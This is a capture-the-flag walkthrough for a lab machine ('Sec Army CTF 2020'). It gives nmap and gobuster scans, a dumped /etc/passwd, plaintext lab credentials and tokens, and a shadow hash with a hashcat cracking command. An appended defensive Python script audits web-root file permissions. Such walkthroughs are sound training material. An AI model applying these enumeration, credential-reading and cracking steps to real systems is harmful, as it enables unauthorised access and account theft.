Sec Army CTF 2020

NMAP

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 18:11 PKT
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 18:11 (0:00:12 remaining)
Nmap scan report for 192.168.1.5
Host is up (0.00012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.7
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2c:54:d0:5a:ae:b3:4f:5b:f8:65:5d:13:c9:ee:86:75 (RSA)
| 256 0c:2b:3a:bd:80:86:f8:6c:2f:9e:ec:e4:7d:ad:83:bf (ECDSA)
|_ 256 2b:4f:04:e0:e5:81:e4:4c:11:2f:92:2a:72:95:58:4e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Totally Secure Website
MAC Address: 08:00:27:4D:91:E3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Challenge 1 (Uno)

gobuster dir -u http://192.168.1.5:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Challenge 2 (Dos)

root:x:0:0:root:/root:/bin/bash                                           
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
uno:x:1001:1001:,,,:/home/uno:/bin/bash
dos:x:1002:1002:,,,:/home/dos:/bin/bash
tres:x:1003:1003:,,,:/home/tres:/bin/bash
cuatro:x:1004:1004:,,,:/home/cuatro:/bin/bash
cinco:x:1005:1005:,,,:/home/cinco:/bin/bash
seis:x:1006:1006:,,,:/home/seis:/bin/bash
siete:x:1007:1007:,,,:/home/siete:/bin/bash
ocho:x:1008:1008:,,,:/home/ocho:/bin/bash
nueve:x:1009:1009:,,,:/home/nueve:/bin/bash
ftp:x:108:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
cero:x:1000:1000:,,,:/home/cero:/bin/bash
dos@svos:~$ ls -la
total 180
drwx------ 7 dos dos 4096 Oct 19 19:46 .
drwxr-xr-x 12 root root 4096 Oct 19 11:05 ..
-rw-rw-r-- 1 dos dos 47 Oct 5 09:24 1337.txt
-rw-r--r-- 1 dos dos 220 Sep 22 11:36 .bash_logout
-rw-r--r-- 1 dos dos 3771 Sep 22 11:36 .bashrc
drwx------ 2 dos dos 4096 Sep 22 12:49 .cache
drwx------ 2 dos dos 4096 Sep 22 13:59 .elinks
drwxr-xr-x 2 dos dos 135168 Sep 27 14:51 files
drwx------ 3 dos dos 4096 Sep 22 12:49 .gnupg
drwxrwxr-x 3 dos dos 4096 Sep 22 13:24 .local
-rw-r--r-- 1 dos dos 807 Sep 22 11:36 .profile
-rw-rw-r-- 1 dos dos 104 Sep 23 09:52 readme.txt
dos@svos:~$ cat readme.txt
You are required to find the following string inside the files folder:
a8211ac1853a1235d48829414626512a
dos@svos:~$
Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

Challenge 3 (Tres)

dos@svos:~$ cat 1337.txt 
Our netcat application is too 1337 to handle..

Challenge 4 (Cuatro)

Challenge 5 (Cinco)

image-0 Hello
image-1 and
image-2 congrats
image-3 for
image-4 solving
image-5 this
image-6 challenge,
image-7 we
image-8 hope
image-9 that
image-10 you
image-11 enojoyed
image-12 the
image-13 challenges
image-14 we
image-15 presented
image-16 so
image-17 far.
image-18 It
image-19 is
image-20 time
image-21 for
image-22 us
image-23 to
image-24 increase
image-25 the
image-26 difficulty
image-27 level
image-28 and
image-29 make
image-30 the
image-31 upcoming
image-32 challenges
image-33 more
image-34 challenging
image-35 than
image-36 previous
image-37 ones.
image-38 Before
image-39 you
image-40 move
image-41 to
image-42 the
image-43 next
image-44 challenge,
image-45 here
image-46 are
image-47 the
image-48 credentials
image-49 for
image-50 the
image-51 5th
image-52 user
image-53 cinco:ruy70m35
image-54 head
image-55 over
image-56 to
image-57 this
image-58 user
image-59 and
image-60 get
image-61 your
image-62 5th
image-63 flag!
image-64 goodluck
cinco@svos:~$ cat readme.txt 
Check for Cinco's secret place somewhere outside the house
cinco@svos:~$
seis:$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:18532:0:99999:7:::
hashcat -a 0 -m 1800 -o cracked.txt hash /usr/share/wordlists/rockyou.tx

Challenge 6 (Seis)

Challenge 7 (Siete)

/var/www/html/shellcmsdashboard
$ cat readme9213.txt
cat: readme9213.txt: Permission denied
$ ls -la
total 24
drwxrwxrwx 2 root root 4096 Oct 18 15:02 .
drwxr-xr-x 5 root root 4096 Oct 8 17:51 ..
-rwxrwxrwx 1 root root 1459 Oct 1 17:57 aabbzzee.php
-rwxrwxrwx 1 root root 1546 Oct 18 15:02 index.php
--wx-wx-wx 1 www-data root 48 Oct 8 17:54 readme9213.txt
-rwxrwxrwx 1 root root 58 Oct 1 17:37 robots.txt
$ chmod u=rwx readme9213.txt
$ cat readme9213.txt
password for the seventh user is 6u1l3rm0p3n473
$
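
The listing above shows a world-writable directory and a file whose mode (`--wx-wx-wx`) drops the read bit while its owner is `www-data`, so the owner can `chmod` it back. As an added example (not part of the original write-up), this Python audit flags those conditions under a web root; the function names, issue labels and the `notes.txt` sample file are assumptions made for the illustration.

```python
import os
import stat


def audit_web_root(root, web_uid):
    """Return sorted (relative_path, issue) pairs for risky entries under root.

    web_uid is the uid the web server runs as (assumption: passed in by the
    caller; on the host in the listing that account is www-data).
    """
    paths = [root]
    for dirpath, dirnames, filenames in os.walk(root):
        paths += [os.path.join(dirpath, n) for n in dirnames + filenames]
    findings = []
    for path in paths:
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            continue  # a symlink's own mode bits are not meaningful
        rel = os.path.relpath(path, root)
        mode = stat.S_IMODE(st.st_mode)
        if mode & stat.S_IWOTH:
            findings.append((rel, "world-writable"))
        if st.st_uid == web_uid:
            # The owner may change the mode at any time, whatever the bits say.
            findings.append((rel, "web-user-owned"))
            if stat.S_ISREG(st.st_mode) and not mode & stat.S_IRUSR:
                findings.append((rel, "owner-can-restore-read"))
    return sorted(findings)


def build_sample(root):
    """Constructed tree that mirrors the modes in the listing (owner = caller)."""
    modes = {"index.php": 0o777, "readme9213.txt": 0o333, "notes.txt": 0o640}
    for name, mode in modes.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    os.chmod(root, 0o777)


if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        # The current uid stands in for the web server account in this demo.
        for rel, issue in audit_web_root(tmp, os.getuid()):
            print(f"{issue:24} {rel}")
```

On a real host, pass the web root and the uid of the server account; secrets the web process must not read belong in files it neither owns nor can reach through a writable parent directory.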
